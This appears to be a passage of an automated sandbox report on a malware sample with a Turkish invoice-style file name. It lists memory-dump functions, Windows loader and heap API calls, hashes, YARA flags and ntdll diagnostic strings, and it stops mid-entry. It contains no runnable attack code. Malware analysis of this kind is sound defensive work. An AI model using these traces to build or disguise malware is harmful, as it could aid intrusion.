                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID: AfA
                  • API String ID: 3298025750-3160769474
                  • Opcode ID: d5932aee73a0d6f69a1b071cec0428c5042f8ca814df286e9bbcf67385a24a0d
                  • Instruction ID: 7ef677becf297fda1d0aa561dc97d6623694d6679125481b63f908958323e487
                  • Opcode Fuzzy Hash: d5932aee73a0d6f69a1b071cec0428c5042f8ca814df286e9bbcf67385a24a0d
                  • Instruction Fuzzy Hash: C5E06DB26046147BD610EE69EC41EDB33ACDFC9710F404019F90CA7242CA70B91187B5
                  Function 0042B773 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 117 42b773-42b7b7 call 404923 call 42c523 RtlAllocateHeap
                  APIs
                  • RtlAllocateHeap.NTDLL(?,0041E09B,?,?,00000000,?,0041E09B,?,?,?), ref: 0042B7B2
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: e34e10abe938de23fd7b1e4c9f01118daf07397e550868144535cd1bcd6f19bf
                  • Instruction ID: b6b2865531f7d642e7a2aceaeda34a3b9ad03a66bb5b7dad3da1dcf270cbfd86
                  • Opcode Fuzzy Hash: e34e10abe938de23fd7b1e4c9f01118daf07397e550868144535cd1bcd6f19bf
                  • Instruction Fuzzy Hash: 29E092B26042147BDB10EF69EC45FDB37ACEFC9710F104019FA18A7242DA70B91087B5
                  Function 0042B813 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 127 42b813-42b84f call 404923 call 42c523 ExitProcess
                  APIs
                  • ExitProcess.KERNEL32(?,00000000,?,?,AF9D693A,?,?,AF9D693A), ref: 0042B84A
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: 450c6bab94ba090d12a405e63f7726f7082dff4fb0e659ab5c12cd34315764ff
                  • Instruction ID: ecc152096029c2ce991c06a4793f92afd01a601ada9a49821f32715e59e30a4e
                  • Opcode Fuzzy Hash: 450c6bab94ba090d12a405e63f7726f7082dff4fb0e659ab5c12cd34315764ff
                  • Instruction Fuzzy Hash: 01E04676200214BBD620AA6AEC41FAB77ACEBC5714F40402AFA08A7241DA79B91087B4
                  Function 00417924 Relevance: 1.5, APIs: 1, Instructions: 15libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 132 417924-417936 133 417901-417907 LdrLoadDll 132->133 134 417938-41793f 132->134 135 41790a-41790d 133->135
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417905
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: 673c8fe58901bd7f44c5f398775d49de7805e1f1010d5d71a948d0a6eebb35e1
                  • Instruction ID: 108bd6b119bfb7ed73351027258f9a8d149220eb69821cdf5170675373698fcd
                  • Opcode Fuzzy Hash: 673c8fe58901bd7f44c5f398775d49de7805e1f1010d5d71a948d0a6eebb35e1
                  • Instruction Fuzzy Hash: 68D02EB668D20E8FC701CB2CE857B88FBB8AB10304F0501CACC946B290C63162C68B26
                  Function 01B12C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 136 1b12c0a-1b12c0f 137 1b12c11-1b12c18 136->137 138 1b12c1f-1b12c26 LdrInitializeThunk 136->138
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: b5285b03b07288d557584cbc50553fc979635bc923c4e5315a19a3d10fcb70fb
                  • Instruction ID: 42457a740d9ed7797f7ea667bbaa7c2dbc2fe5f83b344273a1e577a4e366d921
                  • Opcode Fuzzy Hash: b5285b03b07288d557584cbc50553fc979635bc923c4e5315a19a3d10fcb70fb
                  • Instruction Fuzzy Hash: 13B09B729015D5C6DA15E76446097177940B7D1701F66C1E1D3070642F4738C1D5E275

                  Non-executed Functions

                  Function 01B52349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-2160512332
                  • Opcode ID: 199aa61a6e60aee8f7f5c8048a363310e811f43a93f372db53398066b45d50fa
                  • Instruction ID: 2bc0ae26b642d5fd3bfab721b48afb8d4fbc3f30fca9c2ac747b065a58c1010d
                  • Opcode Fuzzy Hash: 199aa61a6e60aee8f7f5c8048a363310e811f43a93f372db53398066b45d50fa
                  • Instruction Fuzzy Hash: 0B92AC71605342EBE769DF28C880B6BB7E8FB88750F0449ADFA94D7251D770E844CB92
                  Function 01B08620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                  Download Yara Rule
                  Strings
                  • corrupted critical section, xrefs: 01B454C2
                  • Critical section address, xrefs: 01B45425, 01B454BC, 01B45534
                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B454CE
                  • Address of the debug info found in the active list., xrefs: 01B454AE, 01B454FA
                  • Critical section address., xrefs: 01B45502
                  • Thread identifier, xrefs: 01B4553A
                  • double initialized or corrupted critical section, xrefs: 01B45508
                  • Thread is in a state in which it cannot own a critical section, xrefs: 01B45543
                  • Critical section debug info address, xrefs: 01B4541F, 01B4552E
                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B454E2
                  • Invalid debug info address of this critical section, xrefs: 01B454B6
                  • undeleted critical section in freed memory, xrefs: 01B4542B
                  • 8, xrefs: 01B452E3
                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B4540A, 01B45496, 01B45519
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                  • API String ID: 0-2368682639
                  • Opcode ID: bd9082041313068004b468b8bf95db44f1002853880a5e88d40cdddbbc3d5a94
                  • Instruction ID: 8c53755ea1bbc8c57bf36bbdcc12e54394be28d33bf61d79b6c0ee0c60e28798
                  • Opcode Fuzzy Hash: bd9082041313068004b468b8bf95db44f1002853880a5e88d40cdddbbc3d5a94
                  • Instruction Fuzzy Hash: 72818EB1A01758FFDB25CF99C881BAEBBB9FB08714F208199F505B7291D375A940CB50
                  Function 01B029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                  Download Yara Rule
                  Strings
                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 01B4261F
                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01B42412
                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01B42498
                  • @, xrefs: 01B4259B
                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01B42506
                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01B424C0
                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01B42409
                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01B422E4
                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01B42624
                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01B425EB
                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01B42602
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                  • API String ID: 0-4009184096
                  • Opcode ID: ac6933e6e626863996f0c1f0b5651670dd45cbe500e8a5d4d6c3215c68de0b50
                  • Instruction ID: aa649c90daf144c1c3bb54d4e3679f993aaf9dfc50144652d82230c5d47f5915
                  • Opcode Fuzzy Hash: ac6933e6e626863996f0c1f0b5651670dd45cbe500e8a5d4d6c3215c68de0b50
                  • Instruction Fuzzy Hash: C2027EF1D002299BDB35DB54CD84BEABBB8EB44304F4041DAE609A7281DB709E88DF59
                  Function 01B78B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                  • API String ID: 0-2515994595
                  • Opcode ID: 7705e6893a415e71b4371332d8149a860d4a6149af90b5c678d6cccf587e9d33
                  • Instruction ID: bbe2ba47e00791fa83846a156e677ea1d62f52c1f8915ab023d4f8f4d5e88ea2
                  • Opcode Fuzzy Hash: 7705e6893a415e71b4371332d8149a860d4a6149af90b5c678d6cccf587e9d33
                  • Instruction Fuzzy Hash: A751D0716043019BC72EDF288948BABBBECFF98240F554A5DE9A9C3280E770D644C792
                  Function 01B80274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                  • API String ID: 0-1700792311
                  • Opcode ID: 3777cb6af37c2e7b852969d6bd5b77d0fa295050be8d9a4add543b9d8295fa6b
                  • Instruction ID: cc091a5142724923cc2cf6f6753e1aaf2e727509237a97ef1cf9940e4ada09c0
                  • Opcode Fuzzy Hash: 3777cb6af37c2e7b852969d6bd5b77d0fa295050be8d9a4add543b9d8295fa6b
                  • Instruction Fuzzy Hash: 4DD1EF31600686EFDB2AFF68C451AAEBBF1FF59B54F088089F4459B252C735D948CB24
                  Function 01B589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                  Download Yara Rule
                  Strings
                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B58A3D
                  • VerifierDebug, xrefs: 01B58CA5
                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B58A67
                  • HandleTraces, xrefs: 01B58C8F
                  • AVRF: -*- final list of providers -*- , xrefs: 01B58B8F
                  • VerifierDlls, xrefs: 01B58CBD
                  • VerifierFlags, xrefs: 01B58C50
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                  • API String ID: 0-3223716464
                  • Opcode ID: 7f87e47e8437a0d7848c73b3ca5f186463de632e3aa809231863ecf553cc4621
                  • Instruction ID: 53fc6982a2f1d198fa7081483c8fcc03b9ea55c1fe8560bd3814aba4d6838b97
                  • Opcode Fuzzy Hash: 7f87e47e8437a0d7848c73b3ca5f186463de632e3aa809231863ecf553cc4621
                  • Instruction Fuzzy Hash: CA911671605716EFE76ADF6E8880B5ABBE9EB58B14F04059CFE41AF241D730AC00CB91
                  Function 01ADEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                  • API String ID: 0-1109411897
                  • Opcode ID: 9c2f5b632d993f4b4859cec64ef4fa24aa4a039e98d687e10b58de4c0b87dd36
                  • Instruction ID: b0049c2f9aaec2a6a5c99a65708994fc26b08bd40ff94664395e58eac0fc6412
                  • Opcode Fuzzy Hash: 9c2f5b632d993f4b4859cec64ef4fa24aa4a039e98d687e10b58de4c0b87dd36
                  • Instruction Fuzzy Hash: E9A23C74A0562A8FDF68DF18CD887AABBB5EF85304F1442E9D50EA7250DB349E85CF40
                  Function 01B063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-792281065
                  • Opcode ID: bbb68239311b812ecbf0eb44b261421923cfbdacb2838aad07e450d0da19ddb6
                  • Instruction ID: 66638f0d1765001aa7a55a6d22a1b907b585e15064d7433f695b1a4a5597dd37
                  • Opcode Fuzzy Hash: bbb68239311b812ecbf0eb44b261421923cfbdacb2838aad07e450d0da19ddb6
                  • Instruction Fuzzy Hash: B8912270B003159BEB3EDF18E884BAE7FA1FF04B24F1581AAE9016B281DB709811D791
                  Function 01AC645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                  Download Yara Rule
                  Strings
                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01B29A01
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B29A11, 01B29A3A
                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01B29A2A
                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01B299ED
                  • apphelp.dll, xrefs: 01AC6496
                  • LdrpInitShimEngine, xrefs: 01B299F4, 01B29A07, 01B29A30
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-204845295
                  • Opcode ID: 79762f9aa717d32106b98b4ba1623f1d87b658ccc7fa56a35dde51f01b79d31d
                  • Instruction ID: 3b0b76d6f2fe0b29f24521beb8e0557c50f06623591540e6b68335058e97c9f3
                  • Opcode Fuzzy Hash: 79762f9aa717d32106b98b4ba1623f1d87b658ccc7fa56a35dde51f01b79d31d
                  • Instruction Fuzzy Hash: BC51D171208314AFE724DF24D985FAB77E8FB88A48F44491EF58D97261D730E908CB92
                  Function 01B0C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                  Download Yara Rule
                  Strings
                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 01B481E5
                  • LdrpInitializeProcess, xrefs: 01B0C6C4
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B0C6C3
                  • minkernel\ntdll\ldrredirect.c, xrefs: 01B48181, 01B481F5
                  • Loading import redirection DLL: '%wZ', xrefs: 01B48170
                  • LdrpInitializeImportRedirection, xrefs: 01B48177, 01B481EB
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                  • API String ID: 0-475462383
                  • Opcode ID: d9e3860dbaabb73a18b2182166c3c06f411ff6515b2a6bead605f14679b92592
                  • Instruction ID: d3c0c16641c3d164ac600c8da70a0a55439b14411ae7e529d67a756506cd8837
                  • Opcode Fuzzy Hash: d9e3860dbaabb73a18b2182166c3c06f411ff6515b2a6bead605f14679b92592
                  • Instruction Fuzzy Hash: D3311571644346AFC628EF69DD86E2BBBD4FF94B10F05469CF9806B291D720EC04C7A2
                  Function 01B02674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                  Download Yara Rule
                  Strings
                  • SXS: %s() passed the empty activation context, xrefs: 01B42165
                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01B42178
                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01B421BF
                  • RtlGetAssemblyStorageRoot, xrefs: 01B42160, 01B4219A, 01B421BA
                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01B42180
                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01B4219F
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                  • API String ID: 0-861424205
                  • Opcode ID: f89326581ee16b09a5286af9c98f87d7bcd502fd6b03a92455321873afc4decb
                  • Instruction ID: 1e693ac0e6ec1b981d828d4998b5a213f21ae0dae5bd5adb6d3bbb054ffb6cc8
                  • Opcode Fuzzy Hash: f89326581ee16b09a5286af9c98f87d7bcd502fd6b03a92455321873afc4decb
                  • Instruction Fuzzy Hash: F0313B36F0021577FB2A8ADADC85F5A7E78EB94A80F0540DDBB0477181D3B09E40D6A1
                  Function 01B1096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 01B12DF0: LdrInitializeThunk.NTDLL ref: 01B12DFA
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B10BA3
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B10BB6
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B10D60
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B10D74
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                  • String ID:
                  • API String ID: 1404860816-0
                  • Opcode ID: dc6ba052f5995cf117111018afa78a4fa7af508080f682b4a105fc9f0ac3dc4e
                  • Instruction ID: 570c0a05aa87dccf4ae923debf9cda249c184e269508c7295347ab338abfb163
                  • Opcode Fuzzy Hash: dc6ba052f5995cf117111018afa78a4fa7af508080f682b4a105fc9f0ac3dc4e
                  • Instruction Fuzzy Hash: 604248769007159FDB29CF28C880BAAB7F5FF08304F5585E9E9899B245D770AA84CF60
                  Function 01ADA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                  • API String ID: 0-379654539
                  • Opcode ID: eafa36726358db79eb8ac2b6d1d2f29a57fe06ea795855f096c4c3d1efb33529
                  • Instruction ID: 9386b10d675f8eb398304793e0357e73561a53a66f13885d8e08b27d700d8b8c
                  • Opcode Fuzzy Hash: eafa36726358db79eb8ac2b6d1d2f29a57fe06ea795855f096c4c3d1efb33529
                  • Instruction Fuzzy Hash: 35C18AB4108B82CFD715CF68C144B6AB7F4FF84704F4489AAF9968B251E734CA49CB56
                  Function 01B08402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                  Download Yara Rule
                  Strings
                  • LdrpInitializeProcess, xrefs: 01B08422
                  • @, xrefs: 01B08591
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B08421
                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01B0855E
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-1918872054
                  • Opcode ID: 0d2d4a82aa7a0f64f6208ca21427af4b0d24b2b0d92ca67a9770c5fa35aa1170
                  • Instruction ID: 9e66c2fbd15cc2fcc1b75ee6528699623998be541eb3481545b60eb07a4a1ac6
                  • Opcode Fuzzy Hash: 0d2d4a82aa7a0f64f6208ca21427af4b0d24b2b0d92ca67a9770c5fa35aa1170
                  • Instruction Fuzzy Hash: 8291AE71908745AFDB26DF65CC41FABBAE8FF88644F4049AEF684D2151E331DA04CB62
                  Function 01B0273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                  Download Yara Rule
                  Strings
                  • .Local, xrefs: 01B028D8
                  • SXS: %s() passed the empty activation context, xrefs: 01B421DE
                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01B422B6
                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01B421D9, 01B422B1
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                  • API String ID: 0-1239276146
                  • Opcode ID: 88c12f566618e9d93ba9ac55e705727c78bc254e16c2a6f3fb0c190fff2a2309
                  • Instruction ID: 6e4ff091b2ca88ecdd038409d22778751f7084ac5f42c0be17ac4b43315ccf7a
                  • Opcode Fuzzy Hash: 88c12f566618e9d93ba9ac55e705727c78bc254e16c2a6f3fb0c190fff2a2309
                  • Instruction Fuzzy Hash: D1A1C235900229DBDF2ACF58D888BA9B7B4FF58354F1541E9E909A7291D7309E84CF90
                  Function 01B04AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                  Download Yara Rule
                  Strings
                  • RtlDeactivateActivationContext, xrefs: 01B43425, 01B43432, 01B43451
                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01B43437
                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01B4342A
                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01B43456
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
